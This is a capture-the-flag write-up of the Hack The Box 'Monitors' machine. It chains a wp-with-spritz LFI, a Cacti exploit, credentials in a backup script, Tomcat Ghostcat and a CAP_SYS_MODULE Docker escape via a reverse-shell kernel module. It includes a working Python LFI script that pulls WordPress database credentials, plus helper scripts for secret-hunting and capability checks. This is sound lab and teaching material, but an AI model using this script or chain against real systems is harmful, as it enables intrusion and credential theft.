🔎🦶 Enumeration/Foothold

Monitors is a Hard box from HTB created by TheCyberGeek. This box features a WordPress plugin exploit (wp-with-spritz) allowing LFI/RFI, and an internal Docker container running Apache Tomcat. I begin each box by running RustScan. This is bundled into my setup.sh script, which I’ve mentioned in a few of my other posts. Running RustScan with NMAP filters shows a website available on Port 80. The website states ‘Sorry, direct IP access is not allowed’ but provides an admin contact email.

admin@monitors.htb email address.

I edit my hosts file and add in monitors.htb.

Navigating to the domain I see a WordPress website. Reviewing the page, I can see the copyright says 2018 and the last post is from 2020. I begin a WPScan with full flags.

Running out-of-date WordPress.

While the scan is running I notice that wp-with-spritz has been detected and its last update was in 2015.

wp-with-spritz coming up with 2015 as the last update.

A short search later shows me ExploitDB entry 44544, which describes an LFI/RFI in the plugin. I tried a few RFIs to gain code execution or a shell but was unsuccessful.

Next I used the LFI (Local File Inclusion) to pull the wp-config.php file, which stores the database credentials for a WordPress installation. I viewed it in the page source as it tends to look cleaner than the rendered view.

wp-config.php viewed in source.

I try the credentials to log in to the WordPress admin but they don’t work. I check a few locations for the next point of escalation. Reviewing NMAP, I realize the machine is running Apache/2.4.29. I pull the Apache 000-default.conf through the same LFI to see if the page we saw earlier gives any additional information or if any other hosts exist.

Running Apache/2.4.29.

An additional VHOST is available.
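The two LFI pulls above (wp-config.php for the database credentials, then the Apache vhost config for extra hostnames) are easy to script. The following is an added example, not code from the original post or from the ExploitDB entry: the plugin path and `url` parameter are the ones the public PoC for 44544 uses, while the target URL, the DB values and the vhost names in the embedded samples are constructed for the test and are not the real ones from the box.

```python
"""Pull files through the wp-with-spritz LFI and extract the useful bits.

Added example (not from the original post). The plugin path and `url`
parameter match the public PoC for ExploitDB 44544; the host, DB values
and vhost names in the constructed samples below are made up.
"""
import re
import urllib.parse
import urllib.request

# Vulnerable endpoint: the `url` parameter is handed to file_get_contents()
# without validation, so any path readable by the web server works.
SPRITZ_PATH = "/wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php"


def lfi_url(base, path):
    """Build the LFI request URL for an absolute path on the target."""
    # Traversal prefix as used in the public PoC; it keeps working even if
    # a leading slash is stripped from the parameter.
    payload = "/../../../.." + path
    return base.rstrip("/") + SPRITZ_PATH + "?url=" + urllib.parse.quote(payload, safe="/")


def fetch(base, path, timeout=10):
    """Read a file from the target through the LFI (live network call)."""
    with urllib.request.urlopen(lfi_url(base, path), timeout=timeout) as resp:
        return resp.read().decode("utf-8", "replace")


# Matches define('DB_USER', 'wpadmin'); with either quote style and any spacing.
_DEFINE = re.compile(r"""define\(\s*['"](DB_\w+)['"]\s*,\s*['"]([^'"]*)['"]\s*\)""")


def parse_wp_config(text):
    """Return the DB_* constants from a wp-config.php body as a dict."""
    return {k: v for k, v in _DEFINE.findall(text)}


_VHOST = re.compile(r"^\s*(ServerName|ServerAlias)\s+(.+?)\s*$", re.M | re.I)


def parse_vhosts(text):
    """Collect every hostname named in an Apache vhost config (e.g. 000-default.conf)."""
    hosts = []
    for _, value in _VHOST.findall(text):
        for h in value.split():       # ServerAlias may list several names
            if h not in hosts:
                hosts.append(h)
    return hosts


# Constructed samples standing in for the files pulled via the LFI.
SAMPLE_WP_CONFIG = """<?php
define( 'DB_NAME', 'wordpress' );
define( 'DB_USER', 'wpadmin' );
define( 'DB_PASSWORD', 'S3cr3t-Example' );   # constructed, not the real one
define( 'DB_HOST', 'localhost' );
"""

SAMPLE_APACHE_CONF = """<VirtualHost *:80>
    ServerName monitors.htb
    DocumentRoot /var/www/wordpress
</VirtualHost>
<VirtualHost *:80>
    ServerName internal.monitors.htb
    DocumentRoot /var/www/html
</VirtualHost>
"""

if __name__ == "__main__":
    # Live use (assumes the default Ubuntu paths for wp-config.php and Apache):
    #   base = "http://monitors.htb"
    #   creds = parse_wp_config(fetch(base, "/var/www/wordpress/wp-config.php"))
    #   hosts = parse_vhosts(fetch(base, "/etc/apache2/sites-enabled/000-default.conf"))
    print(lfi_url("http://monitors.htb", "/etc/passwd"))
    print(parse_wp_config(SAMPLE_WP_CONFIG))
    print(parse_vhosts(SAMPLE_APACHE_CONF))
```

Every hostname that `parse_vhosts` returns goes into the hosts file next; the paths in the `__main__` comment are the stock Ubuntu locations and are an assumption about the target, not something the post states.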

I add the new host to my hosts file and navigate to the new subdomain. I try the credentials found earlier in wp-config.php and log in. It took me a second as I needed to use admin for the username and not wpadmin.

I navigate around the console looking for a file upload or script option. Next I check the version, which is located at the top right of the page.

Cacti 1.2.12

🔝 Escalation

This leads me to ExploitDB 49810, which I pull to my attack VM and run. I fill in the required variables and submit the request, giving me a low-privilege shell.

⚠ Attack Machine (Tab 1)

ExploitDB 49810 running successfully.

⚠ Attack Machine (Tab 2)

After getting onto the machine and upgrading my shell, I tried to use curl or wget to pull files to the box but was unable to, as neither was installed. Using nc I pulled LinEnum to the box instead.

🎯 Victim Machine

⚠ Attack Machine

Going through the endless string of results I notice cacti-backup.service. I also notice that the user marcus, who I was trying to escalate to, has a .backup directory.

.backup directory in marcus’ home directory.

cacti-backup.service running on the machine.

Reviewing cacti-backup.service I can see that it runs a shell script from the .backup folder mentioned earlier. Viewing that script gives me his credentials. I su to his account, grab the flag and try SSH.

cacti-backup.service showing a backup script running from .backup.

The password for marcus in backup.sh.
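The pattern here (a systemd unit whose ExecStart points at a script in a user's home directory, and the script carrying a hard-coded password) is worth checking for systematically rather than eyeballing LinEnum output. The following is an added example, not code from the original post or from LinEnum: it extracts the Exec* targets from unit files, reports whether the current user can read or write each one, and greps a script body for credential-looking lines. The unit text and script body embedded below are constructed samples shaped like the cacti-backup.service case, not the real files from the box.

```python
"""Audit systemd units for Exec* scripts we can read or write.

Added example, not from the original post or LinEnum. SAMPLE_UNIT and
SAMPLE_SCRIPT are constructed to mirror the cacti-backup.service case.
"""
import os
import re
import stat

# Exec*= lines; systemd allows prefix characters (-, @, +, !, :) before the path.
_EXEC = re.compile(r"^\s*(ExecStart(?:Pre|Post)?|ExecStop|ExecReload)\s*=\s*[-@+!:]*(\S+)", re.M)

# Lines that look like a hard-coded credential in a shell script.
_SECRET = re.compile(r"(pass(word)?|pwd|secret|token|key)\s*=|sshpass\s+-p", re.I)


def exec_paths(unit_text):
    """Return the executable path from every Exec*= line in a unit file."""
    return [path for _, path in _EXEC.findall(unit_text)]


def audit_path(path):
    """Describe ownership/permissions of path from our point of view (None if missing)."""
    try:
        st = os.stat(path)
    except OSError:
        return None
    return {
        "path": path,
        "owner_uid": st.st_uid,
        "world_readable": bool(st.st_mode & stat.S_IROTH),
        "world_writable": bool(st.st_mode & stat.S_IWOTH),
        "we_can_read": os.access(path, os.R_OK),
        "we_can_write": os.access(path, os.W_OK),   # writable => code exec as the unit's User
    }


def grep_secrets(text):
    """Return the lines of a script that look like they embed a credential."""
    return [line.strip() for line in text.splitlines() if _SECRET.search(line)]


def audit_units(unit_dir="/etc/systemd/system"):
    """Walk *.service files and report every Exec* target we can read or write (live use)."""
    findings = []
    for name in sorted(os.listdir(unit_dir)):
        if not name.endswith(".service"):
            continue
        with open(os.path.join(unit_dir, name), errors="replace") as f:
            for path in exec_paths(f.read()):
                info = audit_path(path)
                if info and (info["we_can_read"] or info["we_can_write"]):
                    findings.append((name, info))
    return findings


SAMPLE_UNIT = """[Unit]
Description=Cacti Backup Service (constructed sample)

[Service]
Type=oneshot
User=marcus
ExecStart=/home/marcus/.backup/backup.sh

[Install]
WantedBy=multi-user.target
"""

SAMPLE_SCRIPT = """#!/bin/bash
# constructed sample of a backup script with a hard-coded credential
backup_pass="ExamplePassw0rd"
sshpass -p "$backup_pass" scp -r /var/www/cacti backup@10.0.0.5:/srv/
"""

if __name__ == "__main__":
    for path in exec_paths(SAMPLE_UNIT):
        print(path, audit_path(path))          # None here: the sample path does not exist
    print(grep_secrets(SAMPLE_SCRIPT))
    # On a live box: for name, info in audit_units(): print(name, info)
```

A script that is merely readable leaks whatever it embeds, which is what happened here; one that is writable by a low-privileged user is worse, since the unit's `User=` (or root, when no `User=` is set) executes it on the next run.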

I log in with SSH and read the note.

This must be a clue to how I progress. I check running services and listening ports looking for a Docker installation. I notice Port 8443 open locally, which wasn’t visible on the original scan. I use SSH to forward the port to my local host.

Port 8443 open on the local host.

Apache Tomcat/9.0.31 running on the localhost.

Viewing the page does not give me the exploit I was hoping for, but I do notice Apache Tomcat/9.0.31 running, a version with publicly known exploits. A short Google search later shows me that a Metasploit module is available.

Apache Tomcat ‘Ghostcat’ Exploit via Metasploit

The first time I ran the exploit it errored and told me to set ForceExploit to override. Doing this gave me a Meterpreter shell.

ForceExploit option used due to the localhost pivot.

After running the exploit I could see I was root inside the Docker container. I knew the next steps were to escape and escalate. I found this article on HackTricks: HackTricks – Docker Breakout.

In the previous output you can see that the SYS_MODULE capability is enabled. Going through the first link led me to a second article focused fully on CAP_SYS_MODULE: HackTricks – CAP_SYS_MODULE. Truthfully this part can be confusing, so just follow the article as best you can.
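The capability check that drives this step is reading the CapEff mask of your shell (from /proc/self/status, or via `capsh --decode=`) and spotting anything beyond Docker's default set. The following is an added example, not code from the original post or from HackTricks: it decodes a CapEff mask into names using the bit numbers from the kernel's capability.h, subtracts Docker's default capability set, and reports the ones generally treated as container-escape enablers. The /proc status text embedded below is a constructed sample resembling a root shell in a container started with `--cap-add=SYS_MODULE`; the ESCAPE_CAPS list is my own selection.

```python
"""Decode CapEff from /proc/<pid>/status and flag escape-enabling capabilities.

Added example, not from the original post or HackTricks. Bit numbers follow
include/uapi/linux/capability.h; SAMPLE_STATUS is constructed.
"""
import re

# Capability number -> name (numbering per capability.h).
CAP_NAMES = {
    0: "CAP_CHOWN", 1: "CAP_DAC_OVERRIDE", 2: "CAP_DAC_READ_SEARCH",
    3: "CAP_FOWNER", 4: "CAP_FSETID", 5: "CAP_KILL", 6: "CAP_SETGID",
    7: "CAP_SETUID", 8: "CAP_SETPCAP", 9: "CAP_LINUX_IMMUTABLE",
    10: "CAP_NET_BIND_SERVICE", 11: "CAP_NET_BROADCAST", 12: "CAP_NET_ADMIN",
    13: "CAP_NET_RAW", 14: "CAP_IPC_LOCK", 15: "CAP_IPC_OWNER",
    16: "CAP_SYS_MODULE", 17: "CAP_SYS_RAWIO", 18: "CAP_SYS_CHROOT",
    19: "CAP_SYS_PTRACE", 20: "CAP_SYS_PACCT", 21: "CAP_SYS_ADMIN",
    22: "CAP_SYS_BOOT", 23: "CAP_SYS_NICE", 24: "CAP_SYS_RESOURCE",
    25: "CAP_SYS_TIME", 26: "CAP_SYS_TTY_CONFIG", 27: "CAP_MKNOD",
    28: "CAP_LEASE", 29: "CAP_AUDIT_WRITE", 30: "CAP_AUDIT_CONTROL",
    31: "CAP_SETFCAP", 32: "CAP_MAC_OVERRIDE", 33: "CAP_MAC_ADMIN",
    34: "CAP_SYSLOG", 35: "CAP_WAKE_ALARM", 36: "CAP_BLOCK_SUSPEND",
    37: "CAP_AUDIT_READ", 38: "CAP_PERFMON", 39: "CAP_BPF",
    40: "CAP_CHECKPOINT_RESTORE",
}

# Docker's default capability set (mask 0x00000000a80425fb).
DOCKER_DEFAULT = {
    "CAP_CHOWN", "CAP_DAC_OVERRIDE", "CAP_FSETID", "CAP_FOWNER", "CAP_MKNOD",
    "CAP_NET_RAW", "CAP_SETGID", "CAP_SETUID", "CAP_SETFCAP", "CAP_SETPCAP",
    "CAP_NET_BIND_SERVICE", "CAP_SYS_CHROOT", "CAP_KILL", "CAP_AUDIT_WRITE",
}

# Capabilities commonly treated as sufficient for a container escape on their
# own (my selection; CAP_SYS_MODULE is the one used on this box).
ESCAPE_CAPS = {"CAP_SYS_ADMIN", "CAP_SYS_MODULE", "CAP_SYS_PTRACE",
               "CAP_SYS_RAWIO", "CAP_DAC_READ_SEARCH"}


def decode_mask(mask):
    """Turn a capability bitmask into a list of names, lowest bit first."""
    names = []
    bit = 0
    while mask >> bit:
        if (mask >> bit) & 1:
            names.append(CAP_NAMES.get(bit, f"CAP_{bit}"))
        bit += 1
    return names


def parse_status(text):
    """Return {field: int} for the Cap* lines of a /proc/<pid>/status body."""
    return {m.group(1): int(m.group(2), 16)
            for m in re.finditer(r"^(Cap\w+):\s*([0-9a-fA-F]+)\s*$", text, re.M)}


def dangerous_caps(status_text):
    """Effective caps beyond Docker's default set that enable an escape, sorted."""
    eff = set(decode_mask(parse_status(status_text).get("CapEff", 0)))
    return sorted((eff - DOCKER_DEFAULT) & ESCAPE_CAPS)


def live_check(pid="self"):
    """Run dangerous_caps() against the real /proc/<pid>/status (live use)."""
    with open(f"/proc/{pid}/status") as f:
        return dangerous_caps(f.read())


# Constructed sample: Docker's default mask plus bit 16 (CAP_SYS_MODULE).
SAMPLE_STATUS = """Name:\tbash
Uid:\t0\t0\t0\t0
CapInh:\t00000000a80525fb
CapPrm:\t00000000a80525fb
CapEff:\t00000000a80525fb
CapBnd:\t00000000a80525fb
CapAmb:\t0000000000000000
"""

if __name__ == "__main__":
    print(decode_mask(parse_status(SAMPLE_STATUS)["CapEff"]))
    print("dangerous:", dangerous_caps(SAMPLE_STATUS))   # CAP_SYS_MODULE
```

Being root inside the container is not enough by itself; it is the effective capability set that decides whether `insmod` of a module you built will be accepted by the host kernel, which is why this check comes before pulling the module source over.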

🎯 Victim Machine

⚠ Attack Machine

Use the copy button (on the website) to copy reverse-shell.c and the Makefile. Edit line 8 of reverse-shell.c and put in your own IP/port. Make sure when copying the Makefile that each command line under a target starts with a real tab character, not spaces, or make will reject it. When done, launch a web server and pull both files to the machine.

📜 Makefile

📜 reverse-shell.c

After we build and load reverse-shell.ko inside the Docker container, our reverse shell pops and we are root on the host.

Root on Monitors from HTB.

Rooted

Published On: October 9th, 2021 / Categories: HTB, Technology